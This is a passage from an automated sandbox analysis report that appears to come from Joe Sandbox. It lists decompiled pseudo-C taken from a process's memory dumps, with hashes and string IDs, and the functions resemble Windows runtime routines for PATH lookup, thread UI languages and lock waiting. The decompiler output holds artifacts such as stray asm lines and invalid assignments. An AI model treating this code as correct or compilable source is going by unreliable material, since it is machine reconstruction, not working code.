                            												goto L30;
                            											} else {
                            												goto L22;
                            											}
                            										}
                            									} else {
                            										L22:
                            										 *_t278 =  *(_v60 + _t291 * 4);
                            										 *(_t278 + 0x18) = _t321;
                            										_t241 =  *(_v60 + _t291 * 4);
                            										__eflags = _t241 - 8;
                            										if(__eflags > 0) {
                            											goto L56;
                            										} else {
                            											switch( *((intOrPtr*)(_t241 * 4 +  &M037F2959))) {
                            												case 0:
                            													__ax =  *0x38b8488;
                            													__eflags = __ax;
                            													if(__ax == 0) {
                            														goto L29;
                            													} else {
                            														__ax & 0x0000ffff = E0380F3E0(__edi,  *0x38b848c, __ax & 0x0000ffff);
                            														__eax =  *0x38b8488 & 0x0000ffff;
                            														goto L26;
                            													}
                            													goto L122;
                            												case 1:
                            													L45:
                            													E0380F3E0(_t321, _v80, _v64);
                            													_t267 = _v64;
                            													goto L26;
                            												case 2:
                            													 *0x38b8480 & 0x0000ffff = E0380F3E0(__edi,  *0x38b8484,  *0x38b8480 & 0x0000ffff);
                            													__eax =  *0x38b8480 & 0x0000ffff;
                            													__eax = ( *0x38b8480 & 0x0000ffff) >> 1;
                            													__edi = __edi + __eax * 2;
                            													goto L28;
                            												case 3:
                            													__eax = _v44;
                            													__eflags = __eax;
                            													if(__eax == 0) {
                            														goto L29;
                            													} else {
                            														__esi = __eax + __eax;
                            														__eax = E0380F3E0(__edi, _v72, __esi);
                            														__edi = __edi + __esi;
                            														__esi = _v52;
                            														goto L27;
                            													}
                            													goto L122;
                            												case 4:
                            													_push(0x2e);
                            													_pop(__eax);
                            													 *(__esi + 0x44) = __edi;
                            													 *__edi = __ax;
                            													__edi = __edi + 4;
                            													_push(0x3b);
                            													_pop(__eax);
                            													 *(__edi - 2) = __ax;
                            													goto L29;
                            												case 5:
                            													__eflags = _v36;
                            													if(_v36 == 0) {
                            														goto L45;
                            													} else {
                            														E0380F3E0(_t321, _v76, _v36);
                            														_t267 = _v36;
                            													}
                            													L26:
                            													_t337 = _t337 + 0xc;
                            													_t321 = _t321 + (_t267 >> 1) * 2 + 2;
                            													__eflags = _t321;
                            													L27:
                            													_push(0x3b);
                            													_pop(_t269);
                            													 *((short*)(_t321 - 2)) = _t269;
                            													goto L28;
                            												case 6:
                            													__ebx =  *0x38b575c;
                            													__eflags = __ebx - 0x38b575c;
                            													if(__ebx != 0x38b575c) {
                            														_push(0x3b);
                            														_pop(__esi);
                            														do {
                            															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                            															E0380F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                            															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                            															__edi = __edi + __eax * 2;
                            															__edi = __edi + 2;
                            															 *(__edi - 2) = __si;
                            															__ebx =  *__ebx;
                            															__eflags = __ebx - 0x38b575c;
                            														} while (__ebx != 0x38b575c);
                            														__esi = _v52;
                            														__ecx = _v16;
                            														__edx = _v32;
                            													}
                            													__ebx = _v56;
                            													goto L29;
                            												case 7:
                            													 *0x38b8478 & 0x0000ffff = E0380F3E0(__edi,  *0x38b847c,  *0x38b8478 & 0x0000ffff);
                            													__eax =  *0x38b8478 & 0x0000ffff;
                            													__eax = ( *0x38b8478 & 0x0000ffff) >> 1;
                            													__eflags = _a8;
                            													__edi = __edi + __eax * 2;
                            													if(_a8 != 0) {
                            														__ecx = __edi;
                            														__eax = E038539F2(__ecx);
                            														__edi = __eax;
                            													}
                            													goto L28;
                            												case 8:
                            													__eax = 0;
                            													 *(__edi - 2) = __ax;
                            													 *0x38b6e58 & 0x0000ffff = E0380F3E0(__edi,  *0x38b6e5c,  *0x38b6e58 & 0x0000ffff);
                            													 *(__esi + 0x38) = __edi;
                            													__eax =  *0x38b6e58 & 0x0000ffff;
                            													__eax = ( *0x38b6e58 & 0x0000ffff) >> 1;
                            													__edi = __edi + __eax * 2;
                            													__edi = __edi + 2;
                            													L28:
                            													_t291 = _v16;
                            													_t308 = _v32;
                            													L29:
                            													_t278 = _t278 + 4;
                            													__eflags = _t278;
                            													_v56 = _t278;
                            													goto L30;
                            											}
                            										}
                            									}
                            									goto L122;
                            									L30:
                            									_t291 = _t291 + 1;
                            									_v16 = _t291;
                            									__eflags = _t291 - _v48;
                            								} while (_t291 < _v48);
                            								goto L31;
                            							}
                            						}
                            					}
                            				} else {
                            					while(1) {
                            						L1:
                            						_t241 =  *(_v60 + _t319 * 4);
                            						if(_t241 > 8) {
                            							break;
                            						}
                            						switch( *((intOrPtr*)(_t241 * 4 +  &M037F2935))) {
                            							case 0:
                            								__ax =  *0x38b8488;
                            								__eflags = __ax;
                            								if(__eflags != 0) {
                            									__eax = __ax & 0x0000ffff;
                            									__ebx = __ebx + 2;
                            									__eflags = __ebx;
                            									goto L53;
                            								}
                            								goto L14;
                            							case 1:
                            								L44:
                            								_t308 =  &_v64;
                            								_v80 = E037F2E3E(0,  &_v64);
                            								_t278 = _t278 + _v64 + 2;
                            								goto L13;
                            							case 2:
                            								__eax =  *0x38b8480 & 0x0000ffff;
                            								__ebx = __ebx + __eax;
                            								__eflags = __dl;
                            								if(__eflags != 0) {
                            									__eax = 0x38b8480;
                            									goto L94;
                            								}
                            								goto L14;
                            							case 3:
                            								__eax = E037DEEF0(0x38b79a0);
                            								__eax =  &_v44;
                            								_push(__eax);
                            								_push(0);
                            								_push(0);
                            								_push(4);
                            								_push(L"PATH");
                            								_push(0);
                            								L71();
                            								__esi = __eax;
                            								_v68 = __esi;
                            								__eflags = __esi - 0xc0000023;
                            								if(__esi != 0xc0000023) {
                            									L10:
                            									__eax = E037DEB70(__ecx, 0x38b79a0);
                            									__eflags = __esi - 0xc0000100;
                            									if(__eflags == 0) {
                            										_v44 = _v44 & 0x00000000;
                            										__eax = 0;
                            										_v68 = 0;
                            										goto L13;
                            									} else {
                            										__eflags = __esi;
                            										if(__esi < 0) {
                            											L32:
                            											_t215 = _v72;
                            											__eflags = _t215;
                            											if(_t215 != 0) {
                            												L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
                            											}
                            											_t216 = _v52;
                            											__eflags = _t216;
                            											if(_t216 != 0) {
                            												__eflags = _t327;
                            												if(_t327 < 0) {
                            													L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
                            													_t216 = 0;
                            												}
                            											}
                            											goto L36;
                            										} else {
                            											__eax = _v44;
                            											__ebx = __ebx + __eax * 2;
                            											__ebx = __ebx + 2;
                            											__eflags = __ebx;
                            											L13:
                            											_t287 = _v36;
                            											goto L14;
                            										}
                            									}
                            								} else {
                            									__eax = _v44;
                            									__ecx =  *0x38b7b9c; // 0x0
                            									_v44 + _v44 =  *[fs:0x30];
                            									__ecx = __ecx + 0x180000;
                            									__eax = L037E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                            									_v72 = __eax;
                            									__eflags = __eax;
                            									if(__eax == 0) {
                            										__eax = E037DEB70(__ecx, 0x38b79a0);
                            										__eax = _v52;
                            										L36:
                            										_pop(_t320);
                            										_pop(_t328);
                            										__eflags = _v8 ^ _t333;
                            										_pop(_t279);
                            										return E0380B640(_t216, _t279, _v8 ^ _t333, _t308, _t320, _t328);
                            									} else {
                            										__ecx =  &_v44;
                            										_push(__ecx);
                            										_push(_v44);
                            										_push(__eax);
                            										_push(4);
                            										_push(L"PATH");
                            										_push(0);
                            										L71();
                            										__esi = __eax;
                            										_v68 = __eax;
                            										goto L10;
                            									}
                            								}
                            								goto L122;
                            							case 4:
                            								__ebx = __ebx + 4;
                            								goto L14;
                            							case 5:
                            								_t274 = _v56;
                            								if(_v56 != 0) {
                            									_t308 =  &_v36;
                            									_t276 = E037F2E3E(_t274,  &_v36);
                            									_t287 = _v36;
                            									_v76 = _t276;
                            								}
                            								if(_t287 == 0) {
                            									goto L44;
                            								} else {
                            									_t278 = _t278 + 2 + _t287;
                            								}
                            								goto L14;
                            							case 6:
                            								__eax =  *0x38b5764 & 0x0000ffff;
                            								goto L53;
                            							case 7:
                            								__eax =  *0x38b8478 & 0x0000ffff;
                            								__ebx = __ebx + __eax;
                            								__eflags = _a8;
                            								if(_a8 != 0) {
                            									__ebx = __ebx + 0x16;
                            									__ebx = __ebx + __eax;
                            								}
                            								__eflags = __dl;
                            								if(__eflags != 0) {
                            									__eax = 0x38b8478;
                            									L94:
                            									_v32 = __eax;
                            								}
                            								goto L14;
                            							case 8:
                            								__eax =  *0x38b6e58 & 0x0000ffff;
                            								__eax = ( *0x38b6e58 & 0x0000ffff) + 2;
                            								L53:
                            								__ebx = __ebx + __eax;
                            								L14:
                            								_t319 = _t319 + 1;
                            								if(_t319 >= _v48) {
                            									goto L16;
                            								} else {
                            									_t308 = _v37;
                            									goto L1;
                            								}
                            								goto L122;
                            						}
                            					}
                            					L56:
                            					_t292 = 0x25;
                            					asm("int 0x29");
                            					asm("out 0x28, al");
                            					if(__eflags <= 0) {
                            						asm("o16 sub [edi+0x3], bh");
                            					}
                            					_t339 = _t337 + _t241;
                            					__eflags = _t339;
                            					asm("daa");
                            					if(__eflags <= 0) {
                            						if (__eflags > 0) goto L62;
                            					}
                            					_t241 = _t241 +  *((intOrPtr*)(_t326 + 0x28));
                            					__eflags = _t241;
                            				}
                            				L122:
                            			}







































                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID: PATH
                            • API String ID: 0-1036084923
                            • Opcode ID: e12572a6699f798bba3e15fefbf5d312b5ca229f7652213b75b36d0f7cbb1f22
                            • Instruction ID: 42bc3e23a1ec1ab982c11dc30204710b259816ad024272d9acbf13e1ca21f975
                            • Opcode Fuzzy Hash: e12572a6699f798bba3e15fefbf5d312b5ca229f7652213b75b36d0f7cbb1f22
                            • Instruction Fuzzy Hash: 59C19079E00219DFCB15DFA8D880BAEB7B5FF49710F184469E601EB391E734A941DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 80%
                            			E037FFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                            				char _v5;
                            				signed int _v8;
                            				signed int _v12;
                            				char _v16;
                            				char _v17;
                            				char _v20;
                            				signed int _v24;
                            				char _v28;
                            				char _v32;
                            				signed int _v40;
                            				void* __ecx;
                            				void* __edi;
                            				void* __ebp;
                            				signed int _t73;
                            				intOrPtr* _t75;
                            				signed int _t77;
                            				signed int _t79;
                            				signed int _t81;
                            				intOrPtr _t83;
                            				intOrPtr _t85;
                            				intOrPtr _t86;
                            				signed int _t91;
                            				signed int _t94;
                            				signed int _t95;
                            				signed int _t96;
                            				signed int _t106;
                            				signed int _t108;
                            				signed int _t114;
                            				signed int _t116;
                            				signed int _t118;
                            				signed int _t122;
                            				signed int _t123;
                            				void* _t129;
                            				signed int _t130;
                            				void* _t132;
                            				intOrPtr* _t134;
                            				signed int _t138;
                            				signed int _t141;
                            				signed int _t147;
                            				intOrPtr _t153;
                            				signed int _t154;
                            				signed int _t155;
                            				signed int _t170;
                            				void* _t174;
                            				signed int _t176;
                            				signed int _t177;
                            
                            				_t129 = __ebx;
                            				_push(_t132);
                            				_push(__esi);
                            				_t174 = _t132;
                            				_t73 =  !( *( *(_t174 + 0x18)));
                            				if(_t73 >= 0) {
                            					L5:
                            					return _t73;
                            				} else {
                            					E037DEEF0(0x38b7b60);
                            					_t134 =  *0x38b7b84; // 0x77de7b80
                            					_t2 = _t174 + 0x24; // 0x24
                            					_t75 = _t2;
                            					if( *_t134 != 0x38b7b80) {
                            						_push(3);
                            						asm("int 0x29");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						_push(0x38b7b60);
                            						_t170 = _v8;
                            						_v28 = 0;
                            						_v40 = 0;
                            						_v24 = 0;
                            						_v17 = 0;
                            						_v32 = 0;
                            						__eflags = _t170 & 0xffff7cf2;
                            						if((_t170 & 0xffff7cf2) != 0) {
                            							L43:
                            							_t77 = 0xc000000d;
                            						} else {
                            							_t79 = _t170 & 0x0000000c;
                            							__eflags = _t79;
                            							if(_t79 != 0) {
                            								__eflags = _t79 - 0xc;
                            								if(_t79 == 0xc) {
                            									goto L43;
                            								} else {
                            									goto L9;
                            								}
                            							} else {
                            								_t170 = _t170 | 0x00000008;
                            								__eflags = _t170;
                            								L9:
                            								_t81 = _t170 & 0x00000300;
                            								__eflags = _t81 - 0x300;
                            								if(_t81 == 0x300) {
                            									goto L43;
                            								} else {
                            									_t138 = _t170 & 0x00000001;
                            									__eflags = _t138;
                            									_v24 = _t138;
                            									if(_t138 != 0) {
                            										__eflags = _t81;
                            										if(_t81 != 0) {
                            											goto L43;
                            										} else {
                            											goto L11;
                            										}
                            									} else {
                            										L11:
                            										_push(_t129);
                            										_t77 = E037D6D90( &_v20);
                            										_t130 = _t77;
                            										__eflags = _t130;
                            										if(_t130 >= 0) {
                            											_push(_t174);
                            											__eflags = _t170 & 0x00000301;
                            											if((_t170 & 0x00000301) == 0) {
                            												_t176 = _a8;
                            												__eflags = _t176;
                            												if(__eflags == 0) {
                            													L64:
                            													_t83 =  *[fs:0x18];
                            													_t177 = 0;
                            													__eflags =  *(_t83 + 0xfb8);
                            													if( *(_t83 + 0xfb8) != 0) {
                            														E037D76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                            														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                            													}
                            													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                            													goto L15;
                            												} else {
                            													asm("sbb edx, edx");
                            													_t114 = E03868938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                            													__eflags = _t114;
                            													if(_t114 < 0) {
                            														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                            														E037CB150();
                            													}
                            													_t116 = E03866D81(_t176,  &_v16);
                            													__eflags = _t116;
                            													if(_t116 >= 0) {
                            														__eflags = _v16 - 2;
                            														if(_v16 < 2) {
                            															L56:
                            															_t118 = E037D75CE(_v20, 5, 0);
                            															__eflags = _t118;
                            															if(_t118 < 0) {
                            																L67:
                            																_t130 = 0xc0000017;
                            																goto L32;
                            															} else {
                            																__eflags = _v12;
                            																if(_v12 == 0) {
                            																	goto L67;
                            																} else {
                            																	_t153 =  *0x38b8638; // 0x0
                            																	_t122 = L037D38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                            																	_t154 = _v12;
                            																	_t130 = _t122;
                            																	__eflags = _t130;
                            																	if(_t130 >= 0) {
                            																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                            																		__eflags = _t123;
                            																		if(_t123 != 0) {
                            																			_t155 = _a12;
                            																			__eflags = _t155;
                            																			if(_t155 != 0) {
                            																				 *_t155 = _t123;
                            																			}
                            																			goto L64;
                            																		} else {
                            																			E037D76E2(_t154);
                            																			goto L41;
                            																		}
                            																	} else {
                            																		E037D76E2(_t154);
                            																		_t177 = 0;
                            																		goto L18;
                            																	}
                            																}
                            															}
                            														} else {
                            															__eflags =  *_t176;
                            															if( *_t176 != 0) {
                            																goto L56;
                            															} else {
                            																__eflags =  *(_t176 + 2);
                            																if( *(_t176 + 2) == 0) {
                            																	goto L64;
                            																} else {
                            																	goto L56;
                            																}
                            															}
                            														}
                            													} else {
                            														_t130 = 0xc000000d;
                            														goto L32;
                            													}
                            												}
                            												goto L35;
                            											} else {
                            												__eflags = _a8;
                            												if(_a8 != 0) {
                            													_t77 = 0xc000000d;
                            												} else {
                            													_v5 = 1;
                            													L037FFCE3(_v20, _t170);
                            													_t177 = 0;
                            													__eflags = 0;
                            													L15:
                            													_t85 =  *[fs:0x18];
                            													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                            													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                            														L18:
                            														__eflags = _t130;
                            														if(_t130 != 0) {
                            															goto L32;
                            														} else {
                            															__eflags = _v5 - _t130;
                            															if(_v5 == _t130) {
                            																goto L32;
                            															} else {
                            																_t86 =  *[fs:0x18];
                            																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                            																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                            																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                            																}
                            																__eflags = _t177;
                            																if(_t177 == 0) {
                            																	L31:
                            																	__eflags = 0;
                            																	L037D70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                            																	goto L32;
                            																} else {
                            																	__eflags = _v24;
                            																	_t91 =  *(_t177 + 0x20);
                            																	if(_v24 != 0) {
                            																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                            																		goto L31;
                            																	} else {
                            																		_t141 = _t91 & 0x00000040;
                            																		__eflags = _t170 & 0x00000100;
                            																		if((_t170 & 0x00000100) == 0) {
                            																			__eflags = _t141;
                            																			if(_t141 == 0) {
                            																				L74:
                            																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                            																				goto L27;
                            																			} else {
                            																				_t177 = E037FFD22(_t177);
                            																				__eflags = _t177;
                            																				if(_t177 == 0) {
                            																					goto L42;
                            																				} else {
                            																					_t130 = E037FFD9B(_t177, 0, 4);
                            																					__eflags = _t130;
                            																					if(_t130 != 0) {
                            																						goto L42;
                            																					} else {
                            																						_t68 = _t177 + 0x20;
                            																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                            																						__eflags =  *_t68;
                            																						_t91 =  *(_t177 + 0x20);
                            																						goto L74;
                            																					}
                            																				}
                            																			}
                            																			goto L35;
                            																		} else {
                            																			__eflags = _t141;
                            																			if(_t141 != 0) {
                            																				_t177 = E037FFD22(_t177);
                            																				__eflags = _t177;
                            																				if(_t177 == 0) {
                            																					L42:
                            																					_t77 = 0xc0000001;
                            																					goto L33;
                            																				} else {
                            																					_t130 = E037FFD9B(_t177, 0, 4);
                            																					__eflags = _t130;
                            																					if(_t130 != 0) {
                            																						goto L42;
                            																					} else {
                            																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                            																						_t91 =  *(_t177 + 0x20);
                            																						goto L26;
                            																					}
                            																				}
                            																				goto L35;
                            																			} else {
                            																				L26:
                            																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                            																				__eflags = _t94;
                            																				L27:
                            																				 *(_t177 + 0x20) = _t94;
                            																				__eflags = _t170 & 0x00008000;
                            																				if((_t170 & 0x00008000) != 0) {
                            																					_t95 = _a12;
                            																					__eflags = _t95;
                            																					if(_t95 != 0) {
                            																						_t96 =  *_t95;
                            																						__eflags = _t96;
                            																						if(_t96 != 0) {
                            																							 *((short*)(_t177 + 0x22)) = 0;
                            																							_t40 = _t177 + 0x20;
                            																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                            																							__eflags =  *_t40;
                            																						}
                            																					}
                            																				}
                            																				goto L31;
                            																			}
                            																		}
                            																	}
                            																}
                            															}
                            														}
                            													} else {
                            														_t147 =  *( *[fs:0x18] + 0xfc0);
                            														_t106 =  *(_t147 + 0x20);
                            														__eflags = _t106 & 0x00000040;
                            														if((_t106 & 0x00000040) != 0) {
                            															_t147 = E037FFD22(_t147);
                            															__eflags = _t147;
                            															if(_t147 == 0) {
                            																L41:
                            																_t130 = 0xc0000001;
                            																L32:
                            																_t77 = _t130;
                            																goto L33;
                            															} else {
                            																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                            																_t106 =  *(_t147 + 0x20);
                            																goto L17;
                            															}
                            															goto L35;
                            														} else {
                            															L17:
                            															_t108 = _t106 | 0x00000080;
                            															__eflags = _t108;
                            															 *(_t147 + 0x20) = _t108;
                            															 *( *[fs:0x18] + 0xfc0) = _t147;
                            															goto L18;
                            														}
                            													}
                            												}
                            											}
                            											L33:
                            										}
                            									}
                            								}
                            							}
                            						}
                            						L35:
                            						return _t77;
                            					} else {
                            						 *_t75 = 0x38b7b80;
                            						 *((intOrPtr*)(_t75 + 4)) = _t134;
                            						 *_t134 = _t75;
                            						 *0x38b7b84 = _t75;
                            						_t73 = E037DEB70(_t134, 0x38b7b60);
                            						if( *0x38b7b20 != 0) {
                            							_t73 =  *( *[fs:0x30] + 0xc);
                            							if( *((char*)(_t73 + 0x28)) == 0) {
                            								_t73 = E037DFF60( *0x38b7b20);
                            							}
                            						}
                            						goto L5;
                            					}
                            				}
                            			}
                            0x037ffadf
                            0x037ffadf
                            0x037ffae1
                            0x037ffae4
                            0x037ffae7
                            0x037ffaec
                            0x037ffaf8
                            0x037ffb00
                            0x037ffb07
                            0x037ffb0f
                            0x037ffb0f
                            0x037ffb07
                            0x00000000
                            0x037ffaf8
                            0x037ffadd

                            Strings
                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0383BE0F
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                            • API String ID: 0-865735534
                            • Opcode ID: 6ece77863586bf37034f1c030cb4e32e33090ab6b8ebc2948b3ca1f81d6fd7d5
                            • Instruction ID: acc5257abe961f9df73181a620cb9fb1ca745af69abf4dc812505c1ab2afed32
                            • Opcode Fuzzy Hash: 6ece77863586bf37034f1c030cb4e32e33090ab6b8ebc2948b3ca1f81d6fd7d5
                            • Instruction Fuzzy Hash: 09A1E175A017568FDB25DFA8C454B7AB3E9BF45720F0845AAEA06DB790EF30D801CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 63%
                            			E037C2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                            				signed char _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				signed int _v52;
                            				void* __esi;
                            				void* __ebp;
                            				intOrPtr _t55;
                            				signed int _t57;
                            				signed int _t58;
                            				char* _t62;
                            				signed char* _t63;
                            				signed char* _t64;
                            				signed int _t67;
                            				signed int _t72;
                            				signed int _t77;
                            				signed int _t78;
                            				signed int _t88;
                            				intOrPtr _t89;
                            				signed char _t93;
                            				signed int _t97;
                            				signed int _t98;
                            				signed int _t102;
                            				signed int _t103;
                            				intOrPtr _t104;
                            				signed int _t105;
                            				signed int _t106;
                            				signed char _t109;
                            				signed int _t111;
                            				void* _t116;
                            
                            				_t102 = __edi;
                            				_t97 = __edx;
                            				_v12 = _v12 & 0x00000000;
                            				_t55 =  *[fs:0x18];
                            				_t109 = __ecx;
                            				_v8 = __edx;
                            				_t86 = 0;
                            				_v32 = _t55;
                            				_v24 = 0;
                            				_push(__edi);
                            				if(__ecx == 0x38b5350) {
                            					_t86 = 1;
                            					_v24 = 1;
                            					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                            				}
                            				_t103 = _t102 | 0xffffffff;
                            				if( *0x38b7bc8 != 0) {
                            					_push(0xc000004b);
                            					_push(_t103);
                            					E038097C0();
                            				}
                            				if( *0x38b79c4 != 0) {
                            					_t57 = 0;
                            				} else {
                            					_t57 = 0x38b79c8;
                            				}
                            				_v16 = _t57;
                            				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                            					_t93 = _t109;
                            					L23();
                            				}
                            				_t58 =  *_t109;
                            				if(_t58 == _t103) {
                            					__eflags =  *(_t109 + 0x14) & 0x01000000;
                            					_t58 = _t103;
                            					if(__eflags == 0) {
                            						_t93 = _t109;
                            						E037F1624(_t86, __eflags);
                            						_t58 =  *_t109;
                            					}
                            				}
                            				_v20 = _v20 & 0x00000000;
                            				if(_t58 != _t103) {
                            					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                            				}
                            				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                            				_t88 = _v16;
                            				_v28 = _t104;
                            				L9:
                            				while(1) {
                            					if(E037E7D50() != 0) {
                            						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                            					} else {
                            						_t62 = 0x7ffe0382;
                            					}
                            					if( *_t62 != 0) {
                            						_t63 =  *[fs:0x30];
                            						__eflags = _t63[0x240] & 0x00000002;
                            						if((_t63[0x240] & 0x00000002) != 0) {
                            							_t93 = _t109;
                            							E0385FE87(_t93);
                            						}
                            					}
                            					if(_t104 != 0xffffffff) {
                            						_push(_t88);
                            						_push(0);
                            						_push(_t104);
                            						_t64 = E03809520();
                            						goto L15;
                            					} else {
                            						while(1) {
                            							_t97 =  &_v8;
                            							_t64 = E037FE18B(_t109 + 4, _t97, 4, _t88, 0);
                            							if(_t64 == 0x102) {
                            								break;
                            							}
                            							_t93 =  *(_t109 + 4);
                            							_v8 = _t93;
                            							if((_t93 & 0x00000002) != 0) {
                            								continue;
                            							}
                            							L15:
                            							if(_t64 == 0x102) {
                            								break;
                            							}
                            							_t89 = _v24;
                            							if(_t64 < 0) {
                            								L0381DF30(_t93, _t97, _t64);
                            								_push(_t93);
                            								_t98 = _t97 | 0xffffffff;
                            								__eflags =  *0x38b6901;
                            								_push(_t109);
                            								_v52 = _t98;
                            								if( *0x38b6901 != 0) {
                            									_push(0);
                            									_push(1);
                            									_push(0);
                            									_push(0x100003);
                            									_push( &_v12);
                            									_t72 = E03809980();
                            									__eflags = _t72;
                            									if(_t72 < 0) {
                            										_v12 = _t98 | 0xffffffff;
                            									}
                            								}
                            								asm("lock cmpxchg [ecx], edx");
                            								_t111 = 0;
                            								__eflags = 0;
                            								if(0 != 0) {
                            									__eflags = _v12 - 0xffffffff;
                            									if(_v12 != 0xffffffff) {
                            										_push(_v12);
                            										E038095D0();
                            									}
                            								} else {
                            									_t111 = _v12;
                            								}
                            								return _t111;
                            							} else {
                            								if(_t89 != 0) {
                            									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                            									_t77 = E037E7D50();
                            									__eflags = _t77;
                            									if(_t77 == 0) {
                            										_t64 = 0x7ffe0384;
                            									} else {
                            										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                            									}
                            									__eflags =  *_t64;
                            									if( *_t64 != 0) {
                            										_t64 =  *[fs:0x30];
                            										__eflags = _t64[0x240] & 0x00000004;
                            										if((_t64[0x240] & 0x00000004) != 0) {
                            											_t78 = E037E7D50();
                            											__eflags = _t78;
                            											if(_t78 == 0) {
                            												_t64 = 0x7ffe0385;
                            											} else {
                            												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                            											}
                            											__eflags =  *_t64 & 0x00000020;
                            											if(( *_t64 & 0x00000020) != 0) {
                            												_t64 = E03847016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                            											}
                            										}
                            									}
                            								}
                            								return _t64;
                            							}
                            						}
                            						_t97 = _t88;
                            						_t93 = _t109;
                            						E0385FDDA(_t97, _v12);
                            						_t105 =  *_t109;
                            						_t67 = _v12 + 1;
                            						_v12 = _t67;
                            						__eflags = _t105 - 0xffffffff;
                            						if(_t105 == 0xffffffff) {
                            							_t106 = 0;
                            							__eflags = 0;
                            						} else {
                            							_t106 =  *(_t105 + 0x14);
                            						}
                            						__eflags = _t67 - 2;
                            						if(_t67 > 2) {
                            							__eflags = _t109 - 0x38b5350;
                            							if(_t109 != 0x38b5350) {
                            								__eflags = _t106 - _v20;
                            								if(__eflags == 0) {
                            									_t93 = _t109;
                            									E0385FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                            								}
                            							}
                            						}
                            						_push("RTL: Re-Waiting\n");
                            						_push(0);
                            						_push(0x65);
                            						_v20 = _t106;
                            						E03855720();
                            						_t104 = _v28;
                            						_t116 = _t116 + 0xc;
                            						continue;
                            					}
                            				}
                            			}





































                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Re-Waiting
                            • API String ID: 0-316354757
                            • Opcode ID: 43c2db053a77b88c41a7200cca583831e3f5ceebc8e6270dbb339153d6758eb6
                            • Instruction ID: 44ef9853aeaceb76f3a10c13f47a12e5f955ff3a5ff7beaa54e22beda77e4259
